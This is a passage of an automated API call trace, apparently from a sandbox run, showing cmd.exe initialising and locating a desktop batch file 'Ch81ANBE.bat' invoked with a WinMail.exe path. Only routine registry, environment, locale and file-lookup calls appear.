lpData=0x2ce9e0*=0x40, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x40, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x40, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.084] RegCloseKey (hKey=0x68) returned 0x0 [0232.084] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9d4 | out: phkResult=0x2ce9d4*=0x68) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x40, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x1, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x1, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x0, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.084] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x9, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.085] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x4, lpData=0x2ce9e0*=0x9, lpcbData=0x2ce9d8*=0x4) returned 0x0 [0232.085] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9dc, lpData=0x2ce9e0, lpcbData=0x2ce9d8*=0x1000 | out: lpType=0x2ce9dc*=0x0, lpData=0x2ce9e0*=0x9, lpcbData=0x2ce9d8*=0x1000) returned 0x2 [0232.085] RegCloseKey (hKey=0x68) returned 0x0 [0232.085] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e300 [0232.085] srand (_Seed=0x5f51e300) [0232.085] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"\"" [0232.085] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"\"" [0232.085] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0232.086] GetProcessHeap () returned 0x530000 [0232.086] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x5420d8 [0232.086] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5420e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0232.086] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.087] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.087] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.087] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.087] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.087] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.087] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.087] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.087] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.087] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.087] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.087] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.087] GetProcessHeap () returned 0x530000 [0232.087] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x542bb0 | out: hHeap=0x530000) returned 1 [0232.087] GetEnvironmentStringsW () returned 0x5422f0* [0232.087] GetProcessHeap () returned 0x530000 [0232.087] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xae2) returned 0x544c50 [0232.087] FreeEnvironmentStringsW (penv=0x5422f0) returned 1 [0232.087] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.087] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.087] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.087] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0232.088] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0232.088] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0232.088] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0232.088] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0232.088] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0232.088] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.088] GetProcessHeap () returned 0x530000 [0232.088] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5417a8 [0232.088] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0232.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7a0, lpFilePart=0x2cf79c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf79c*="Desktop") returned 0x25 [0232.088] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0232.088] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf51c | out: lpFindFileData=0x2cf51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x545740 [0232.088] FindClose (in: hFindFile=0x545740 | out: hFindFile=0x545740) returned 1 [0232.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf51c | out: lpFindFileData=0x2cf51c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x545740 [0232.088] FindClose (in: hFindFile=0x545740 | out: hFindFile=0x545740) returned 1 [0232.089] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0232.089] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf51c | out: lpFindFileData=0x2cf51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x545740 [0232.089] FindClose (in: hFindFile=0x545740 | out: hFindFile=0x545740) returned 1 [0232.089] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0232.089] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0232.089] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0232.089] GetProcessHeap () returned 0x530000 [0232.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544c50 | out: hHeap=0x530000) returned 1 [0232.089] GetEnvironmentStringsW () returned 0x544160* [0232.089] GetProcessHeap () returned 0x530000 [0232.089] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb36) returned 0x545f80 [0232.089] FreeEnvironmentStringsW (penv=0x544160) returned 1 [0232.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0232.089] GetProcessHeap () returned 0x530000 [0232.089] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5417a8 | out: hHeap=0x530000) returned 1 [0232.089] GetProcessHeap () returned 0x530000 [0232.089] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400e) returned 0x546ac0 [0232.090] GetProcessHeap () returned 0x530000 [0232.090] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x542e30 [0232.090] GetProcessHeap () returned 0x530000 [0232.090] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x54aad8 [0232.090] GetProcessHeap () returned 0x530000 [0232.090] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x54eae8 [0232.091] GetProcessHeap () returned 0x530000 [0232.091] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546ac0 | out: hHeap=0x530000) returned 1 [0232.091] GetConsoleOutputCP () returned 0x1b5 [0232.091] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0232.091] GetUserDefaultLCID () returned 0x409 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8e0, cchData=128 | out: lpLCData="0") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8e0, cchData=128 | out: lpLCData="0") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8e0, cchData=128 | out: lpLCData="1") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0232.092] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0232.092] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.093] GetProcessHeap () returned 0x530000 [0232.093] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20c) returned 0x542f10 [0232.093] GetConsoleTitleW (in: lpConsoleTitle=0x542f10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.094] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0232.094] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0232.094] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0232.094] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0232.095] GetProcessHeap () returned 0x530000 [0232.095] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x546ac0 [0232.095] GetProcessHeap () returned 0x530000 [0232.096] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x546ac0 | out: hHeap=0x530000) returned 1 [0232.097] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0232.097] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0232.097] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0232.097] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0232.098] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0232.098] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0232.098] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0232.098] GetProcessHeap () returned 0x530000 [0232.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x58) returned 0x543128 [0232.098] GetProcessHeap () returned 0x530000 [0232.098] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x552b10 [0232.099] GetProcessHeap () returned 0x530000 [0232.099] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x543188 [0232.100] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.100] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0232.100] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0232.100] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0232.100] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0232.101] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0232.101] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0232.101] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0232.101] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0232.101] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0232.101] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0232.101] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0232.101] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0232.101] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0232.101] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0232.101] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0232.101] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0232.101] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0232.101] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0232.101] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0232.101] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0232.101] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0232.101] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0232.101] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0232.101] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0232.101] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0232.101] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0232.101] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0232.101] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0232.101] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0232.101] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0232.101] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0232.101] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0232.101] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0232.101] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0232.102] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0232.102] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0232.102] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0232.102] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0232.102] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0232.102] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0232.102] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0232.102] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0232.102] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0232.102] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0232.102] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0232.102] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0232.102] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0232.102] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0232.102] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0232.102] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0232.102] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0232.102] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0232.102] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0232.102] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0232.102] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0232.102] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0232.102] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0232.102] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0232.102] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0232.102] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0232.102] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0232.103] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0232.103] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0232.103] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0232.103] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0232.103] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0232.103] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0232.103] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0232.103] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0232.103] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0232.103] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0232.103] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0232.103] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0232.103] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0232.103] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0232.103] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0232.103] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0232.103] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0232.103] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0232.103] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0232.103] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0232.103] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0232.103] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0232.103] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0232.103] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0232.103] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0232.103] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0232.103] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0232.103] GetProcessHeap () returned 0x530000 [0232.103] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x5431f8 [0232.103] GetProcessHeap () returned 0x530000 [0232.104] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xcc) returned 0x543410 [0232.105] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x418) returned 0x5307f0 [0232.106] SetErrorMode (uMode=0x0) returned 0x0 [0232.106] SetErrorMode (uMode=0x1) returned 0x0 [0232.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x5307f8, lpFilePart=0x2cf0f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf0f8*="Desktop") returned 0x25 [0232.106] SetErrorMode (uMode=0x0) returned 0x1 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5307f0, Size=0x6e) returned 0x5307f0 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5307f0) returned 0x6e [0232.106] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5a) returned 0x5434e8 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa8) returned 0x543550 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x543550, Size=0x5a) returned 0x543550 [0232.106] GetProcessHeap () returned 0x530000 [0232.106] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x543550) returned 0x5a [0232.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.107] GetProcessHeap () returned 0x530000 [0232.107] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe0) returned 0x530868 [0232.111] GetProcessHeap () returned 0x530000 [0232.111] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x530868, Size=0x76) returned 0x530868 [0232.111] GetProcessHeap () returned 0x530000 [0232.111] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x530868) returned 0x76 [0232.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.111] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x2cee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee94) returned 0x5435b8 [0232.111] GetProcessHeap () returned 0x530000 [0232.111] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x14) returned 0x5417e0 [0232.111] FindClose (in: hFindFile=0x5435b8 | out: hFindFile=0x5435b8) returned 1 [0232.111] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0232.111] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0232.111] GetConsoleTitleW (in: lpConsoleTitle=0x2cf36c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.112] GetProcessHeap () returned 0x530000 [0232.112] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x11c) returned 0x5308e8 [0232.112] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0232.112] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0232.112] IdentifyCodeAuthzLevelW () returned 0x1 [0232.118] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0232.118] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0232.118] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0232.118] CloseCodeAuthzLevel () returned 0x1 [0232.118] SetErrorMode (uMode=0x0) returned 0x0 [0232.118] SetErrorMode (uMode=0x1) returned 0x0 [0232.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x543200, lpFilePart=0x2cf258 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2cf258*="Ch81ANBE.bat") returned 0x32 [0232.118] SetErrorMode (uMode=0x0) returned 0x1 [0232.119] GetProcessHeap () returned 0x530000 [0232.119] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x72) returned 0x552b90 [0232.119] wcsspn (_String=" \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", _Control=" \x09") returned 0x1 